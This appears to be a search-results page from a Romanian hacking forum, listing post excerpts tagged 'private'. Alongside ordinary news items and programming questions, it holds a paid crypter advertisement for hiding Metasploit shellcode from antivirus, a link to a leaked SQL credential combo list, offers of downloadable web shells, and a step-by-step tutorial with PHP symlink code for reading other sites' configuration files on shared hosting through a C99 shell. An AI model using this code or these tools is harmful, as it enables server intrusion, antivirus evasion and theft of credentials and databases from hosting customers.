Jump to content

Search the Community

Showing results for tags 'private'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 17 results

  1. Criptez si compilezi shellcoduri pentru windows FUD Formatele acceptate sunt urmatoarele: unsigned char buf[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xb5\x15\x86\x7c\xff\xd3..." "...." sau ={0xEB,0x16,0x31,0xC0....}; Caracteristici: - Metoda privata - Anti-debugger - Fiecare criptare este unica (algoritmul difera logica este aceeasi) - Runtime crypter (In-Memory execution) - Decryption key brutforce Features: - Private Method - Anti-debugger - Every job is unique (same algorithm logic differs) - Runtime crypter (In-Memory execution) - Decryption key brutforce Size: ~150kb Scan: http://NoDistribute.com/result/ldgABE4aqGQ32U56nCrRmuJ9W1iNYI Proof: Compatibil cu toate shellcodurile din metasploit pentru windows Compatible with every windows metasploit generated shellcode Nu ofer sample | No sample Contact: PM sau jabber: uc0de@jabber.calyxinstitute.org (nu garantez ca raspund imediat) Pret: 5-10$ (depinde de calitatea postarilor) Timp de livrare: 30-60 min de la confirmarea platii Delivery time: 30-60 min from payment confirmation Plata: preferabil Bitcoin,accept si altele De asemenea generez shellcoduri contra cost Pentru autenticitate ofer un sample numai membrilor din staff
  2. Cumpar Socks 4/5 scanner (private made) sa fie facut in python, sa scaneze pe ip range sau ip class , exclus port 1080, 80 .. Astept oferte pe privat. Copiii/new user sa se abtina, nu fac nici un deal decat cu useri cu reputatie. Multumesc
  3. Dupa cum spune si titlul am nevoie de putin ajutor.As dori sa stiu cum sta treaba cu pensiile private. 1.Trebuie sa am carte de munca cu loc de munca stabil. 2.Care este criteriu de caclul la pensii private. 3.Cat timp trebuie cotizat la acest tip de pensii(Trebuie sa cotizez pe luna/an, sau se poate plati pe 5 ani inainte de exemplu). 4.Ce dezavantaje exista in cazul pensiilor private.(Fara faze, "Da,daca mori,nu platesti,da banca faliment,etc" stiu si eu asta, ma refer depinde de bursa,economia banci etc) Cine are si este in tema as dori putin ajutor.Si daca se poate ce banca imi recomandati. Multumesc !
  4. Now No Government Can Spy On Its Citizens! Taking a cue from Google and Apple, Facebook for the first time is giving its users more encryption options to keep their information private, infuriating agencies like FBI and NSA who believe that “law enforcement and national security investigators need to be able to access communications and information to obtain the evidence necessary to prevent crime and bring criminals to justice in a court of law” and that locking user data places lives in danger by limiting government surveillance. The US government who recently said they will stop spying on Americans is up in arms because this new encryption won’t let them spy on Americans. In a blogpost, Facebook explained how the feature will work: “It’s very important to us that the people who use Facebook feel safe and can trust that their connection to Facebook is secure…Whilst Facebook seeks to secure connections to your email provider with TLS, the stored content of those messages may be accessible as plaintext (with attachments) to anyone who accesses your email provider or email account. To enhance the privacy of this email content, today we are gradually rolling out an experimental new feature that enables people to add OpenPGP public keys to their profile; these keys can be used to “end-to-end” encrypt notification emails sent from Facebook to your preferred email accounts. People may also choose to share OpenPGP keys from their profile, with or without enabling encrypted notifications.” Created as PGP (which stands for “pretty good privacy”), nearly 25 years ago by Phil Zimmermann, OpenPGP is one of the most popular available standards for protecting email with public key encryption. You will be able to update your own public key, using a desktop browser, at: https://www.facebook.com/me/about?section=contact-info The new move will allow users to encrypt notifications sent from the social networking website to their email addresses, protecting potentially sensitive emails, such as a request for a new password, from hackers, spies or anybody who does not have the user’s private key. “It also means that people who activate the email encryption and then lose their private key cannot turn to Facebook for help. The social network would have a copy of the public key uploaded to a user’s Facebook profile, but encrypted chats or emails off the site would still require the users’ private key to unlock. Other account recovery methods like SMS and Trusted Contacts can still work without relying upon email recovery,” explains Jay Nancarrow, a communications manager with Facebook. ??????????????The Committee to Protect Journalists has praised Facebook’s encryption decision. “Facebook has taken an important step to help protect users’ private communications by default, and make the risky environment, in which journalists work, a little bit safer,” said CPJ Internet Advocacy Coordinator Geoffrey King.
  5. Download Private tools 1337w0rm.php
  6. Erroare: An unhandled exception of type 'System.IO.FileNotFoundException' occurred in System.Windows.Forms.dll Additional information: Could not load file or assembly 'TCtrl Connection, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified. Source: Imports Admin_Tool_4s Public Class Form2 Dim TCTRLCon As Connection Private Sub Button8_Click(sender As Object, e As EventArgs) Handles Button8.Click TCTRLCon.Kick(TextBox1.Text) End Sub Private Sub Form2_Load(sender As Object, e As EventArgs) Handles MyBase.Load TCTRLCon = New Connection("#", #) TCTRLCon.Connect() TCTRLCon.Login("#", "#") End Sub Private Sub TextBox1_TextChanged(sender As Object, e As EventArgs) Handles TextBox1.TextChanged End Sub End Class Cand deschid form2.vb primesc eroare asta... An unhandled exception of type 'System.IO.FileNotFoundException' occurred in System.Windows.Forms.dll Additional information: Could not load file or assembly 'TCtrl Connection, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
  7. Solve the captcha to continue | Binbox
  8. Offers on private, pls.
  9. Tot ce vreau eu este sa construiesc un browser in visual basic in care sa se vada si java script de pe site Codul Visual basic Public Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click WebBrowser1.Navigate("http://freebetco.in/") End Sub Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load End Sub Private Sub WebBrowser1_DocumentCompleted(ByVal sender As System.Object, ByVal e As System.Windows.Forms.WebBrowserDocumentCompletedEventArgs) Handles WebBrowser1.DocumentCompleted End Sub End Class Siteul: freebetco.in Te loghezi cu adresa de bitcoin: 1JZVSBf2Bxq3UmdhT6fifVUoBziYeUHAQE Asa arata in Visual basic fara java script
  10. Sql user_pass private combo https://mega.co.nz/#!29RV1CDS!jLiG5G7SFAb9yjXaOglRa3IYPLfV8fosRP6UWsfWwc8
  11. A New York City-based private investigator has pled guilty to one charge of conspiracy to commit computer hacking, which carries a maximum sentence of five years. Eric Saldarriaga allegedly hired hackers to access the email accounts of various victims, a Federal Bureau of Investigation (FBI) press release states. Saldarriaga allegedly had the hackers hand over login credentials, so he could access victims' accounts and review their communications. Manhattan U.S. Attorney Preet Bharara said in the release: “Eric Saldarriaga crossed the line as a private investigator by hiring hackers to unlawfully and secretly access over 60 e-mail accounts, including accounts belonging to people he was investigating.” Saldarriaga's victims allegedly included both people in whom his clients were interested as well as individuals in whom he had a personal interest. Source
  12. As the past has show us, cybercriminals are not the most trustworthy people when it come to holding valuable sources, and it looks like we're about to get another reminder of that, this time with an exploit pack leak. RIG is a popular exploit kit which has been around for about a year and sold on various "underground" forums. On February 3rd 2015 a user claiming to be the "Official HF Sales Rep" posted a sales thread on hackforums (HF), which is unusual as most serious sellers avoid this forum completely. It's likely the decision to allow resellers on this specific board was due to a large amount of users trying to rent out access to their RIG accounts, resulting in lost income for the seller. Hackforums RIG sales thread Although the HF reseller first claimed to be a verified seller, the claims soon escalated into being "more than just a seller", and before long he was registering on private forums claiming to be one of the developers. Sellers with benefits Private forum introduction His introduction into the private forum didn't go too well: First members pointed out that his RIG prices were nearly 40% higher than the official sellers (typical of a re-seller not a developer), then they made fun of him when someone posted screenshots of his website, which was requesting a $3000 payment to gain access to his never-heard-of private forum. Eventually the entire thread turned into people making fun of him, before the administrator banned his account. It seems like the RIG owner was less than pleased with the reseller's antics because the next day, in a conversation with another member, the owner declared that he had suspended the reseller for attempting to scam customers, which isn't surprising given he was requesting that people pay him $3000 for access to an imaginary private forum. Conversation between a HF member and RIG owner Shortly after, the reseller does what any cybercriminal does when his enterprise begins crumbling around him: He sings up for twitter and becomes a security researcher??? I don't even.... The twitter account, which is a pun on MalwareMustDie, claims to be in possession of the RIG source code as well as a recent database dump, and is currently tweeting a download link at various security researchers (not me though, apparently I'm not good enough). The file, which is password protected, was deleted from the filehost after less than 24 downloads, so I am not able to confirm if this is legit or just another scriptkiddie tantrum. A screenshot allegedly showing panel files and sql database dump RIG owner confirms he may have database and older version of exploit kit. I'll post updates when I have more info. Updated 02/12/2015 09:00 (UTC) I've confirmed with 3 people that the leak is in fact legitimate, and a fairly recent version of the pack, though it is possibly some parts may be missing. @kafeine has mentioned that he thinks someone with access to the RIG panel may be stealing traffic. He reports that occasionally the exploit payload appears to be replaced with another (usually cryptowall); which coincides with a lot of claims made by customers who bought RIG through the reseller. a RIG thread pushing 2 different payloads Due to the way in which the RIG exploit pack works (the exploiting is done by a back-end server, so no exploits are contained within the leak), I have decided to upload it here (thanks to @kafeine for files and information). Via RIG Exploit Kit - Source Code Leak | MalwareTech
  13. Table of Contents I. Introduction: .......................................................................................................................... 1 II. Threats posed to business professionals by open Wi-Fi hotspots...................................... 2 A. Most common threats to devices connected to open Wi-Fi hotspots....................................3 1. Types and description of threats................................................................................... 3 2. Basic security measures:................................................................................................ 3 B. Evil Twin............................................................................................................................................4 1. What is an evil twin?...................................................................................................... 4 2.Effects of evil-twin attack on the end user...............................................................................6 III. The repercussions of lack of a sound security for the Wi-Fi.......................................... 6 A.The after-effects of being a victim of cyber-crime....................................................................6 1. Loss of money to restore the system to its original state: ........................................... 6 2. Loss of time in retrieving back the lost/damaged/misused data:............................... 6 IV. Measures to mitigate evil twin attacks............................................................................. 7 A.WPA-PSK method:..........................................................................................................................7 B. Using a Virtual Private Network: ................................................................................................7 C. Awareness of cyber security ........................................................................................................12 D.Introducing the concept of basics of cyber-security to students at an earlier age. .........14 V. The perks of upgrading to stronger security measures as mentioned above:.................. 15 A.Increases the productivity of an organization and reduces the avoidable expenses. .....15 B. Beneficial to end-users as their private data is kept private and unaffected. ..................15 C.Works towards building a better and a robust security system throughout. ..................15 VI. Conclusion:............................................................................................................................ 15 VII. References:........................................................................................................................... 17 Source
  14. Snowden: NSA employees routinely pass around intercepted nude photos "These are seen as the fringe benefits of surveillance positions," Snowden says. Edward Snowden has revealed that he witnessed “numerous instances” of National Security Agency (NSA) employees passing around nude photos that were intercepted “in the course of their daily work.” In a 17-minute interview with The Guardian filmed at a Moscow hotel and published on Thursday, the NSA whistleblower addressed numerous points, noting that he could “live with” being sent to the US prison facility at Guantanamo Bay, Cuba. He also again dismissed any notion that he was a Russian spy or agent—calling those allegations “bullshit.” If Snowden’s allegations of sexual photo distribution are true, they would be consistent with what the NSA has already reported. In September 2013, in a letter from the NSA’s Inspector General Dr. George Ellard to Sen. Chuck Grassley (R-IA), the agency outlined a handful of instances during which NSA agents admitted that they had spied on their former love interests. This even spawned a nickname within the agency, LOVEINT—a riff on HUMINT (human intelligence) or SIGINT (signals intelligence). “You've got young enlisted guys, 18 to 22 years old,” Snowden said. “They've suddenly been thrust into a position of extraordinary responsibility where they now have access to all of your private records. In the course of their daily work they stumble across something that is completely unrelated to their work in any sort of necessary sense. For example, an intimate nude photo of someone in a sexually compromising position. But they're extremely attractive. “So what do they do? They turn around in their chair and show their co-worker. The co-worker says: ‘Hey that's great. Send that to Bill down the way.’ And then Bill sends it to George and George sends it to Tom. And sooner or later this person's whole life has been seen by all of these other people. It's never reported. Nobody ever knows about it because the auditing of these systems is incredibly weak. The fact that your private images, records of your private lives, records of your intimate moments have been taken from your private communications stream from the intended recipient and given to the government without any specific authorization without any specific need is itself a violation of your rights. Why is that in a government database?” Then Alan Rusbridger, The Guardian’s editor-in-chief, asked: “You saw instances of that happening?” “Yeah,” Snowden responded. “Numerous?” “It's routine enough, depending on the company that you keep, it could be more or less frequent. These are seen as the fringe benefits of surveillance positions." Update 5:27pm CT: In an e-mail sent to Ars, NSA spokeswoman Vanee Vines wrote: "NSA is a professional foreign-intelligence organization with a highly trained workforce, including brave and dedicated men and women from our armed forces. As we have said before, the agency has zero tolerance for willful violations of the agency’s authorities or professional standards, and would respond as appropriate to any credible allegations of misconduct." However, she declined to respond to direct questions as to the veracity of Snowden's allegations or if anyone at NSA had ever been terminated or otherwise punished for engaging in such behavior. Snowden: NSA employees routinely pass around intercepted nude photos | Ars Technica
  15. Salut, am 2 functii si vreau sa le fac detour: private void WriteTempRezults(string iD, string test, string points, string time, string memory, string msg) private void InsertListView(string testNumber, string points, string time, string memory, string msg) Problema este ca nu pot sa gasesc adresele la care se afla functiile. Orice indicatie ar bine primita. Aplicatie: Evaluator Virustotal: https://www.virustotal.com/sv/file/8848b.../analysis/
  16. Mai întâi de toate vom folosi func?ia symlink pentru a face o comand? rapid? pentru orice fi?ier sau folder vrem de aceea aceast? func?ie v? va fi foarte util? pentru citirea oric?rui folder sau fi?ier (Pentru mai multe detalii Utiliza?i Google). Aici am folosit Shell Named "C99" pentru a executa micul cod php (Eval Code) pe serverul de shared hosting. Exploit-ul este folosit pentru a desc?rca baza de date a victimei dac? ?i numai dac? victima este într-un host comun Desc?rca?i Shell-ul "C99 Shell" ?i urma?i pa?i. Ob?ine?i Oricare Shell C99 /Pasul 1 $ Incarc? php i.e Shell_R-H.php Shell root path (cale). Care este /home/hackerz/public_html . /Pasul 2 $ Deschide?i fi?ierul înc?rcat. http://www.yoursitename.com/shell_R-H.php /Pasul 3 $ Urm?torul pas este s? citi?i cu aten?ie mai jos php Eval Code. Este vorba despre 10 linii php code !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $filepath='/home/xx/public_html/xx.xx'; $sitepath='/home/xx/public_html/'; $writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath; @unlink($flib); symlink($filepath, $flib); echo readlink($flib) . "\n"; echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>"; @unlink($flib); !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! /Pasul 4 Înlocuirea (xx) pe urma (xx.xx) - (fi?ier-ul ?int?, utilizat de obicei pentru a citi fi?ierele bazei de date de configurare unde g?sim informa?ii de conectare.) EX: - "/home/fbi/public_html/configuration.php" $writeblefilepath, acceseaz? în toate c?ile de scriere asupra site-ului. ?i, de asemenea, este utilizat pentru a face procesul - leg?tura.. scriere ?i ie?ire. Pentru @unlink îl pute?i c?uta pe php.net Este cam vechi in arhiva mea dar merge
  17. Edited. Download Link: shell.txt Puteti schimba parola aici:--> @ $auth_pass = "DE65C26EE56EC4B20A6E86A1D7BB2BC5"; Parola este criptata in md5. Default pass: pgems.in Sursa: HackForums
×
×
  • Create New...